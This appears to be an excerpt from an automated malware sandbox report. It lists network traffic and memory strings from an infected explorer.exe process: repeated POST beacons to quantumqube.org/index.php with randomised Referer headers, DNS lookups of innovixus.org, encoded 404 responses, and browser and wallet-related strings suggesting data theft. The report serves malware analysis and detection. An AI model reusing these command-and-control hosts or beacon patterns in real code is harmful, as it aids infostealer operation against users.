                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wqvfywivxptqmt.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://raievqxnfbig.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvywjtocjkatexf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mxfkxoyxtgh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qxdsgfawkutaw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: quantumqube.org
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: explorer.exe, 0000000D.00000003.2621735460.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2621306051.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2447348106.0000000003510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "www.facebook.com", equals www.facebook.com (Facebook)
                      Source: global trafficDNS traffic detected: DNS query: quantumqube.org
                      Source: global trafficDNS traffic detected: DNS query: innovixus.org
                      Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://upgyyhdoyghspm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: quantumqube.org
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sun, 06 Oct 2024 19:27:36 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingServer: namecheap-nginxData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:27:37 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 66 37 30 0d 0a 40 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 27 d2 6c ac 11 c6 52 d1 3b 37 d7 a5 36 82 b4 8a ab 80 da 1b be 00 a0 92 05 00 03 0c a7 32 01 0b 00 00 07 00 9e 03 00 00 62 02 28 96 e9 7a 2a f4 cb 78 52 7f 40 00 50 00 77 c0 64 47 47 36 9c 8d 96 4a ed d1 9e d6 80 c4 6c 33 99 24 a7 b4 b4 35 c3 e1 cb 26 ef 22 79 42 75 08 78 08 f7 1d 9b dc 6b cb 0a ea f2 8b 19 bf 99 78 b9 82 ba ce 22 33 4f 4a a8 df 50 78 ae 76 77 2e c7 9b 5e 2d 28 67 32 da c8 c9 75 cd d4 a5 2b c1 10 eb 1d a0 33 0d 98 9e 44 f7 6b a9 c6 24 31 3d 1d f1 ea e8 ae 1d d5 84 1f af 15 26 fb 4f bb 25 b9 52 6e f5 a0 8a 0a 49 0e 48 3c 5c 38 d3 13 33 ca aa 9b 5c 35 3f 78 1b f1 19 e1 c2 70 4c e8 73 36 6b 7d d5 d3 6e a4 5e 14 85 a9 0e a1 79 e7 e2 8f d9 fc 87 1e 17 08 2a d3 a7 57 64 02 f2 1f 97 3a 75 05 d6 39 26 05 29 1b 93 de cb 73 67 b8 04 d4 23 37 bf be 0b 34 b2 74 c4 1a 80 c5 9c f5 2b 45 c2 a1 ce 66 f8 cd ce 41 e1 68 9b cb 45 74 60 87 17 b6 fb c9 69 56 c1 7a 75 a6 b6 91 7f 35 28 62 b3 15 0a 3e 77 0b 6c 3f 72 6d c5 b0 62 4a 85 0a 39 54 4a ef 82 78 65 a5 12 89 42 79 18 c4 79 f5 96 4f 76 46 06 c0 e9 22 30 34 84 0f 92 48 07 52 c5 04 c3 48 b7 3d 91 25 be 7c 16 c4 5c 8e 36 d9 7c b3 67 c3 ee a4 67 3b c7 e0 1b 96 44 60 0c 7d 11 6b 01 27 8e 7a 90 1b 83 03 37 9c a1 29 61 04 de ac b2 d8 3c bd 20 60 c8 95 74 8e 89 0b 2c 61 df 2b c0 7e a4 4e 45 3a c3 e4 a8 39 be bb a7 31 20 93 97 a0 a0 b5 7f c7 d6 91 0a 5b 86 18 74 2a fd 7d c4 1d 22 3f b3 3c 56 73 d8 fb 5b 8e 2d a5 e4 07 39 88 5c 2a 6a 3f c8 6c 1d b5 c6 8b f1 be 7f d6 a1 5e 5c 47 ac 65 d7 73 d2 71 71 f5 9a 3d cf 2c e5 1c c6 eb 8c b4 45 e1 0c a1 e8 35 b7 e5 04 54 25 1f 83 1f fd 39 ae 07 62 90 48 e8 f7 cb 93 3c 91 5f fc 84 dd 7a 0b 01 a2 11 6a c4 f4 14 70 65 48 60 21 09 b6 10 7d 2d 97 87 bb 75 c3 0a b7 49 aa 57 7d 10 a3 15 a6 91 59 62 2a 44 9f c7 bd f3 a8 72 60 9d b9 c7 f5 9f d8 aa df 2d 16 2b 15 a2 69 39 7a 26 8a de 9b 6d a1 a2 c6 90 63 f8 37 1d 10 4c e1 29 af 9e 05 fd 3c 1d 17 7a 41 32 b4 77 40 0c 0d a9 bb 8d b7 ba 7a 5d 98 53 fb e6 7e 09 8e 0a 3c cc 99 ef 15 b1 4e ad b0 11 b9 de 26 5d f2 f9 c7 72 49 b9 46 de b0 e4 d6 76 f2 a0 8a fb b2 52 12 6e db 9e e3 84 21 7a 72 ba 59 c6 34 4f 12 9b f7 e0 4c 77 d7 c6 6b a2 99 f6 d9 6b d5 7d 23 04 ce ad 8d 9f 18 aa 9d 74 59 68 c0 42 f7 92 c7 6b 71 4b 65 e4 cd a0 29 e1 92 05 21 d8 c4 ea 8d c1 30 94 87 ab c7 50 14 15 85 86 d2 a0 15 15 e6 d9 f5 12 d8 d4 a1 58 7f b8 41 0e ad df bc 0d a8 ce 32 04 e4 8a 84 7f ee 75 29 7d da 25 86 c8 da 42 6f db 62 73 41 5e f7 ed 15 15 42 fb e6 ea 35 c4 50 ad 56 45 8b 79 53 2b f9 92 ee 64 4c 1b b5 4a fd 76 6a 6c fb 4d d2 a0 9c 79 25 c8 b5 17 5b 8c 8a cb 65 8f b5 89 0b e4 24 b9 de 24 ba 24 c5 b3 95 c4 4e 52 85 c0 ad 92 ff 22 8e ec f3 62 37 33 ba d7 2b ac 7b 1d f7 ef 6c cd 5f 21 5d 0c 2c 91 ae 02 4e a1 c7 4d 32 1
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:28:55 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:11 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:30 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:29:48 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.22.1Date: Sun, 06 Oct 2024 19:30:05 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 32 66 0d 0a 2b 00 00 00 1b f4 cd 81 67 40 84 f7 fb bb af 97 96 00 be 9d 47 d7 bf dc 48 15 53 4e b1 fa 27 45 7c 36 91 fa 56 df a2 ea 1b 9e 23 5e 2e 10 76 0d 0a 30 0d 0a 0d 0a Data Ascii: 2f+g@GHSN'E|6V#^.v0
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: http://jedwatson.github.io/classnames
                      Source: explorer.exe, 00000002.00000000.1473694819.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009255000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/
                      Source: explorer.exe, 00000007.00000002.2375965405.000000000330C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/application/x-www-form-urlencodedMozilla/5.0
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.0000000003304000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000003.2373953881.00000000032C1000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.php
                      Source: explorer.exe, 0000000D.00000003.3028814712.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2721237512.000000000526C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.3328845519.0000000005270000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.php.
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000008.00000002.2347347955.0000000000A79000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3927428692.00000000034F7000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3928236257.00000000010A9000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000B.00000002.3928453017.0000000003297000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3926853756.0000000000859000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000002.3928965249.00000000033D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.phpMozilla/5.0
                      Source: explorer.exe, 00000007.00000002.2375965405.0000000003298000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/index.phpn
                      Source: explorer.exe, 00000007.00000002.2375965405.00000000032C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org/ndex.php
                      Source: explorer.exe, 00000007.00000002.2375965405.00000000032E2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://quantumqube.org:80/index.phpcrosoft
                      Source: explorer.exe, 00000002.00000000.1474886102.0000000007710000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1474899724.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1473187872.0000000002C80000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: http://underscorejs.org/LICENSE
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                      Source: explorer.exe, 00000002.00000000.1475801434.0000000009237000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOS
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSA4
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BC80000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://android.notify.windows.com/iOSd
                      Source: explorer.exe, 00000002.00000000.1474139705.000000000702D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0E948A694F8C48079B908C8EA9DDF9EA&timeOut=5000&oc
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
                      Source: explorer.exe, 00000002.00000000.1475801434.00000000091FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.com
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gF9k-dark
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKBA-dark
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://github.com/jsstyles/css-vendor
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA11f7Wa.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1b2aMG.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1bjET8.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hGNsX.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAT0qC2.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBNvr53.img
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYTL1i.img
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://lodash.com/
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://lodash.com/license
                      Source: explorer.exe, 0000000D.00000003.2628764554.00000000052E6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000D.00000003.2628291158.0000000005240000.00000004.00000020.00020000.00000000.sdmp, wallet-drawer.bundle.js.LICENSE.txt.13.drString found in binary or memory: https://openjsf.org/
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comer
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BDF5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/EM0
                      Source: explorer.exe, 00000002.00000000.1478526429.000000000BBB0000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com48
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: explorer.exe, 00000007.00000003.2362669537.0000000003309000.00000004.00000020.00020000.00000000.sdmp, C794.tmp.7.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
                      Source: explorer.exe, 00000002.00000000.1474139705.0000000006F0F000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
